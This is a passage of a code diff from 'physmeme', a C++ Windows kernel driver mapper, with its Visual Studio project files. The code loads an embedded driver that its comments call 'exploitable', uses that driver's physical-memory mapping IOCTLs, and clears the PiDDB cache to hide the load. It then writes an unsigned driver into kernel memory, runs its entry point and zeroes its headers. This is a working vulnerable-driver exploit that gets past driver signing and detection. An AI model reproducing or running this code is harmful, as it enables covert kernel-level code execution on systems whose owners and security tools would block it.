auto result = RegCreateKeyA(
|
||||
HKEY_LOCAL_MACHINE,
|
||||
reg_key.c_str(),
|
||||
®_handle
|
||||
);
|
||||
|
||||
if (result != ERROR_SUCCESS)
|
||||
return false;
|
||||
|
||||
//
|
||||
// set type to 1 (kernel)
|
||||
//
|
||||
constexpr std::uint8_t type_value = 1;
|
||||
result = RegSetValueExA(
|
||||
reg_handle,
|
||||
"Type",
|
||||
NULL,
|
||||
REG_DWORD,
|
||||
&type_value,
|
||||
4u
|
||||
);
|
||||
|
||||
if (result != ERROR_SUCCESS)
|
||||
return false;
|
||||
|
||||
//
|
||||
// set error control to 3
|
||||
//
|
||||
constexpr std::uint8_t error_control_value = 3;
|
||||
result = RegSetValueExA(
|
||||
reg_handle,
|
||||
"ErrorControl",
|
||||
NULL,
|
||||
REG_DWORD,
|
||||
&error_control_value,
|
||||
4u
|
||||
);
|
||||
|
||||
if (result != ERROR_SUCCESS)
|
||||
return false;
|
||||
|
||||
//
|
||||
// set start to 3
|
||||
//
|
||||
constexpr std::uint8_t start_value = 3;
|
||||
result = RegSetValueExA(
|
||||
reg_handle,
|
||||
"Start",
|
||||
NULL,
|
||||
REG_DWORD,
|
||||
&start_value,
|
||||
4u
|
||||
);
|
||||
|
||||
if (result != ERROR_SUCCESS)
|
||||
return false;
|
||||
|
||||
//
|
||||
// set image path to the driver on disk
|
||||
//
|
||||
result = RegSetValueExA(
|
||||
reg_handle,
|
||||
"ImagePath",
|
||||
NULL,
|
||||
REG_SZ,
|
||||
(std::uint8_t*) drv_path.c_str(),
|
||||
drv_path.size()
|
||||
);
|
||||
|
||||
if (result != ERROR_SUCCESS)
|
||||
return false;
|
||||
|
||||
return ERROR_SUCCESS == RegCloseKey(reg_handle);
|
||||
}
|
||||
|
||||
// this function was coded by paracord: https://githacks.org/snippets/4#L94
|
||||
inline bool enable_privilege(const std::wstring& privilege_name)
|
||||
{
|
||||
HANDLE token_handle = nullptr;
|
||||
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token_handle))
|
||||
return false;
|
||||
|
||||
LUID luid{};
|
||||
if (!LookupPrivilegeValueW(nullptr, privilege_name.data(), &luid))
|
||||
return false;
|
||||
|
||||
TOKEN_PRIVILEGES token_state{};
|
||||
token_state.PrivilegeCount = 1;
|
||||
token_state.Privileges[0].Luid = luid;
|
||||
token_state.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
||||
|
||||
if (!AdjustTokenPrivileges(token_handle, FALSE, &token_state, sizeof(TOKEN_PRIVILEGES), nullptr, nullptr))
|
||||
return false;
|
||||
|
||||
CloseHandle(token_handle);
|
||||
return true;
|
||||
}
|
||||
|
||||
inline std::string get_service_image_path(const std::string& service_name)
|
||||
{
|
||||
HKEY reg_handle;
|
||||
DWORD bytes_read;
|
||||
char image_path[0xFF];
|
||||
static const std::string reg_key("System\\CurrentControlSet\\Services\\");
|
||||
|
||||
auto result = RegOpenKeyA(
|
||||
HKEY_LOCAL_MACHINE,
|
||||
reg_key.c_str(),
|
||||
®_handle
|
||||
);
|
||||
|
||||
result = RegGetValueA(
|
||||
reg_handle,
|
||||
service_name.c_str(),
|
||||
"ImagePath",
|
||||
REG_SZ,
|
||||
NULL,
|
||||
image_path,
|
||||
&bytes_read
|
||||
);
|
||||
|
||||
RegCloseKey(reg_handle);
|
||||
return std::string(image_path);
|
||||
}
|
||||
}
|
||||
|
||||
inline bool load(const std::string& drv_path, const std::string& service_name)
|
||||
{
|
||||
if (!util::enable_privilege(L"SeLoadDriverPrivilege"))
|
||||
return false;
|
||||
|
||||
if (!util::create_service_entry("\\??\\" + std::filesystem::absolute(std::filesystem::path(drv_path)).string(), service_name))
|
||||
return false;
|
||||
|
||||
std::string reg_path("\\Registry\\Machine\\System\\CurrentControlSet\\Services\\");
|
||||
reg_path += service_name;
|
||||
|
||||
static const auto lp_nt_load_drv =
|
||||
::GetProcAddress(
|
||||
GetModuleHandleA("ntdll.dll"),
|
||||
"NtLoadDriver"
|
||||
);
|
||||
|
||||
if (lp_nt_load_drv)
|
||||
{
|
||||
ANSI_STRING driver_rep_path_cstr;
|
||||
UNICODE_STRING driver_reg_path_unicode;
|
||||
|
||||
RtlInitAnsiString(&driver_rep_path_cstr, reg_path.c_str());
|
||||
RtlAnsiStringToUnicodeString(&driver_reg_path_unicode, &driver_rep_path_cstr, true);
|
||||
return ERROR_SUCCESS == reinterpret_cast<nt_load_driver_t>(lp_nt_load_drv)(&driver_reg_path_unicode);
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
inline std::tuple<bool, std::string> load(const std::vector<std::uint8_t>& drv_buffer)
|
||||
{
|
||||
static const auto random_file_name = [](std::size_t length) -> std::string
|
||||
{
|
||||
static const auto randchar = []() -> char
|
||||
{
|
||||
const char charset[] =
|
||||
"0123456789"
|
||||
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
"abcdefghijklmnopqrstuvwxyz";
|
||||
const std::size_t max_index = (sizeof(charset) - 1);
|
||||
return charset[rand() % max_index];
|
||||
};
|
||||
std::string str(length, 0);
|
||||
std::generate_n(str.begin(), length, randchar);
|
||||
return str;
|
||||
};
|
||||
|
||||
const auto service_name = random_file_name(16);
|
||||
const auto file_path = std::filesystem::temp_directory_path().string() + service_name;
|
||||
std::ofstream output_file(file_path.c_str(), std::ios::binary);
|
||||
|
||||
output_file.write((char*)drv_buffer.data(), drv_buffer.size());
|
||||
output_file.close();
|
||||
|
||||
return { load(file_path, service_name), service_name };
|
||||
}
|
||||
|
||||
inline std::tuple<bool, std::string> load(const std::uint8_t* buffer, const std::size_t size)
|
||||
{
|
||||
std::vector<std::uint8_t> image(buffer, buffer + size);
|
||||
return load(image);
|
||||
}
|
||||
|
||||
inline bool unload(const std::string& service_name)
|
||||
{
|
||||
std::string reg_path("\\Registry\\Machine\\System\\CurrentControlSet\\Services\\");
|
||||
reg_path += service_name;
|
||||
|
||||
static const auto lp_nt_unload_drv =
|
||||
::GetProcAddress(
|
||||
GetModuleHandleA("ntdll.dll"),
|
||||
"NtUnloadDriver"
|
||||
);
|
||||
|
||||
if (lp_nt_unload_drv)
|
||||
{
|
||||
ANSI_STRING driver_rep_path_cstr;
|
||||
UNICODE_STRING driver_reg_path_unicode;
|
||||
|
||||
RtlInitAnsiString(&driver_rep_path_cstr, reg_path.c_str());
|
||||
RtlAnsiStringToUnicodeString(&driver_reg_path_unicode, &driver_rep_path_cstr, true);
|
||||
|
||||
const bool unload_drv = !reinterpret_cast<nt_unload_driver_t>(lp_nt_unload_drv)(&driver_reg_path_unicode);
|
||||
const auto image_path = std::filesystem::temp_directory_path().string() + service_name;
|
||||
const bool delete_reg = util::delete_service_entry(service_name);
|
||||
|
||||
try
|
||||
{
|
||||
const bool delete_drv = std::filesystem::remove(image_path);
|
||||
}catch (std::exception& e) {}
|
||||
return unload_drv && delete_reg;
|
||||
}
|
||||
return false;
|
||||
}
|
||||
}
|
@ -0,0 +1,91 @@
|
||||
#include "kernel_ctx/kernel_ctx.h"
|
||||
#include "drv_image/drv_image.h"
|
||||
|
||||
namespace physmeme
|
||||
{
|
||||
NTSTATUS __cdecl map_driver(std::vector<std::uint8_t>& raw_driver)
|
||||
{
|
||||
physmeme::drv_image image(raw_driver);
|
||||
|
||||
//
|
||||
// load exploitable driver
|
||||
//
|
||||
if (!physmeme::load_drv())
|
||||
return STATUS_ABANDONED;
|
||||
|
||||
physmeme::kernel_ctx ctx;
|
||||
|
||||
//
|
||||
// shoot the tires off piddb cache.
|
||||
//
|
||||
const auto drv_timestamp = util::get_file_header(raw_driver.data())->TimeDateStamp;
|
||||
if (!ctx.clear_piddb_cache(physmeme::drv_key, drv_timestamp))
|
||||
return STATUS_ABANDONED;
|
||||
|
||||
//
|
||||
// lambdas used for fixing driver image
|
||||
//
|
||||
const auto _get_module = [&](std::string_view name)
|
||||
{
|
||||
return util::get_module_base(name.data());
|
||||
};
|
||||
|
||||
const auto _get_export_name = [&](const char* base, const char* name)
|
||||
{
|
||||
return reinterpret_cast<std::uintptr_t>(util::get_kernel_export(base, name));
|
||||
};
|
||||
|
||||
//
|
||||
// fix the driver image
|
||||
//
|
||||
image.fix_imports(_get_module, _get_export_name);
|
||||
image.map();
|
||||
|
||||
//
|
||||
// allocate memory in the kernel for the driver
|
||||
//
|
||||
const auto pool_base =
|
||||
ctx.allocate_pool(
|
||||
image.size(),
|
||||
NonPagedPool
|
||||
);
|
||||
|
||||
image.relocate(pool_base);
|
||||
|
||||
//
|
||||
// copy driver into the kernel
|
||||
//
|
||||
ctx.write_kernel(pool_base, image.data(), image.size());
|
||||
|
||||
//
|
||||
// driver entry
|
||||
//
|
||||
auto entry_point = reinterpret_cast<std::uintptr_t>(pool_base) + image.entry_point();
|
||||
|
||||
//
|
||||
// call driver entry
|
||||
//
|
||||
auto result = ctx.syscall<DRIVER_INITIALIZE>(
|
||||
reinterpret_cast<void*>(entry_point),
|
||||
reinterpret_cast<std::uintptr_t>(pool_base),
|
||||
image.size()
|
||||
);
|
||||
|
||||
//
|
||||
// zero driver headers
|
||||
//
|
||||
ctx.zero_kernel_memory(pool_base, image.header_size());
|
||||
|
||||
physmeme::unmap_all();
|
||||
if (!physmeme::unload_drv())
|
||||
return STATUS_ABANDONED;
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
NTSTATUS __cdecl map_driver(std::uint8_t * image, std::size_t size)
|
||||
{
|
||||
std::vector<std::uint8_t> data(image, image + size);
|
||||
return map_driver(data);
|
||||
}
|
||||
}
|
@ -0,0 +1,9 @@
|
||||
#pragma once
|
||||
#include <vector>
|
||||
#include <Windows.h>
|
||||
|
||||
namespace physmeme
|
||||
{
|
||||
NTSTATUS __cdecl map_driver(std::vector<std::uint8_t>& raw_driver);
|
||||
NTSTATUS __cdecl map_driver(std::uint8_t * image, std::size_t size);
|
||||
}
|
@ -0,0 +1,178 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<ProjectGuid>{13FFA531-AD46-46F8-B52D-4A01BA078034}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>physmeme</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>StaticLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>MultiByte</CharacterSet>
|
||||
<SpectreMitigation>false</SpectreMitigation>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<WarningLevel>TurnOffAllWarnings</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp17</LanguageStandard>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<WarningLevel>TurnOffAllWarnings</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp17</LanguageStandard>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<WarningLevel>TurnOffAllWarnings</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp17</LanguageStandard>
|
||||
<Optimization>Disabled</Optimization>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>
|
||||
</PrecompiledHeader>
|
||||
<WarningLevel>TurnOffAllWarnings</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_CRT_SECURE_NO_WARNINGS</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<LanguageStandard>stdcpp17</LanguageStandard>
|
||||
<Optimization>Disabled</Optimization>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="drv_image\drv_image.cpp" />
|
||||
<ClCompile Include="kernel_ctx\kernel_ctx.cpp" />
|
||||
<ClCompile Include="map_driver.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="drv_image\drv_image.h" />
|
||||
<ClInclude Include="kernel_ctx\kernel_ctx.h" />
|
||||
<ClInclude Include="loadup.hpp" />
|
||||
<ClInclude Include="map_driver.hpp" />
|
||||
<ClInclude Include="physmeme\physmeme.hpp" />
|
||||
<ClInclude Include="raw_driver.hpp" />
|
||||
<ClInclude Include="util\hook.hpp" />
|
||||
<ClInclude Include="util\nt.hpp" />
|
||||
<ClInclude Include="util\util.hpp" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
@ -0,0 +1,71 @@
|
||||
๏ปฟ<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files\kernel_ctx">
|
||||
<UniqueIdentifier>{040c8387-476c-4aa5-aa2a-ca30465b41bd}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\kernel_ctx">
|
||||
<UniqueIdentifier>{642c89a0-7989-4f5c-ae5a-f71e697abe16}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Header Files\physmeme">
|
||||
<UniqueIdentifier>{c4aa2f98-70d4-418e-894d-4e1975e2bad2}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Header Files\util">
|
||||
<UniqueIdentifier>{4fd2f117-66bb-4f75-af5b-b7e041a4dc48}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Header Files\drv_image">
|
||||
<UniqueIdentifier>{161b3714-a6cd-4b7b-a1f1-9b90b1f84aca}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\drv_image">
|
||||
<UniqueIdentifier>{ed9d2db3-acef-42c0-880f-7f95dcca819d}</UniqueIdentifier>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="kernel_ctx\kernel_ctx.cpp">
|
||||
<Filter>Source Files\kernel_ctx</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="drv_image\drv_image.cpp">
|
||||
<Filter>Source Files\drv_image</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="map_driver.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="kernel_ctx\kernel_ctx.h">
|
||||
<Filter>Header Files\kernel_ctx</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="util\hook.hpp">
|
||||
<Filter>Header Files\util</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="util\util.hpp">
|
||||
<Filter>Header Files\util</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="util\nt.hpp">
|
||||
<Filter>Header Files\util</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="drv_image\drv_image.h">
|
||||
<Filter>Header Files\drv_image</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="physmeme\physmeme.hpp">
|
||||
<Filter>Header Files\physmeme</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="map_driver.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="loadup.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="raw_driver.hpp">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
</Project>
|
@ -0,0 +1,19 @@
|
||||
๏ปฟ<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LocalDebuggerCommandArguments>C:\Users\interesting\Desktop\hello-world.sys</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LocalDebuggerCommandArguments>C:\Users\interesting\Desktop\hello-world.sys</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LocalDebuggerCommandArguments>C:\Users\interesting\Desktop\hello-world.sys</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LocalDebuggerCommandArguments>C:\Users\interesting\Desktop\hello-world.sys</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
</Project>
|
@ -0,0 +1,112 @@
|
||||
#pragma once
|
||||
#include <windows.h>
|
||||
#include <mutex>
|
||||
#include <cstdint>
|
||||
#include <map>
|
||||
|
||||
#include "../util/util.hpp"
|
||||
#include "../loadup.hpp"
|
||||
#include "../raw_driver.hpp"
|
||||
|
||||
#pragma pack ( push, 1 )
|
||||
typedef struct _GIOMAP
|
||||
{
|
||||
unsigned long interface_type;
|
||||
unsigned long bus;
|
||||
std::uintptr_t physical_address;
|
||||
unsigned long io_space;
|
||||
unsigned long size;
|
||||
} GIOMAP;
|
||||
#pragma pack ( pop )
|
||||
|
||||
#define MAP_PHYS 0xC3502004
|
||||
#define UNMAP_PHYS 0xC3502008
|
||||
|
||||
namespace physmeme
|
||||
{
|
||||
inline std::string drv_key;
|
||||
inline HANDLE drv_handle = NULL;
|
||||
|
||||
// keep track of mappings.
|
||||
inline std::vector<std::pair<std::uintptr_t, std::uint32_t >> virtual_mappings;
|
||||
|
||||
//
|
||||
// please code this function depending on your method of physical read/write.
|
||||
//
|
||||
inline bool load_drv()
|
||||
{
|
||||
const auto [result, key] =
|
||||
driver::load(
|
||||
raw_driver,
|
||||
sizeof(raw_driver)
|
||||
);
|
||||
|
||||
drv_key = key;
|
||||
drv_handle = CreateFile(
|
||||
"\\\\.\\GIO",
|
||||
GENERIC_READ | GENERIC_WRITE,
|
||||
NULL,
|
||||
NULL,
|
||||
OPEN_EXISTING,
|
||||
FILE_ATTRIBUTE_NORMAL,
|
||||
NULL
|
||||
);
|
||||
return drv_handle;
|
||||
}
|
||||
|
||||
//
|
||||
// please code this function depending on your method of physical read/write.
|
||||
//
|
||||
inline bool unload_drv()
|
||||
{
|
||||
return CloseHandle(drv_handle) && driver::unload(drv_key);
|
||||
}
|
||||
|
||||
//
|
||||
// please code this function depending on your method of physical read/write.
|
||||
//
|
||||
inline std::uintptr_t map_phys(
|
||||
std::uintptr_t addr,
|
||||
std::size_t size
|
||||
)
|
||||
{
|
||||
//--- ensure the validity of the address we are going to try and map
|
||||
if (!util::is_valid(addr))
|
||||
return NULL;
|
||||
|
||||
GIOMAP in_buffer = { 0, 0, addr, 0, size };
|
||||
uintptr_t out_buffer[2] = { 0 };
|
||||
unsigned long returned = 0;
|
||||
DeviceIoControl(drv_handle, MAP_PHYS, reinterpret_cast<LPVOID>(&in_buffer), sizeof(in_buffer),
|
||||
reinterpret_cast<LPVOID>(out_buffer), sizeof(out_buffer), &returned, NULL);
|
||||
|
||||
virtual_mappings.emplace_back(std::pair<std::uintptr_t, std::size_t>(out_buffer[0], size));
|
||||
return out_buffer[0];
|
||||
}
|
||||
|
||||
//
|
||||
// please code this function depending on your method of physical read/write.
|
||||
//
|
||||
inline bool unmap_phys(
|
||||
std::uintptr_t addr,
|
||||
std::size_t size
|
||||
)
|
||||
{
|
||||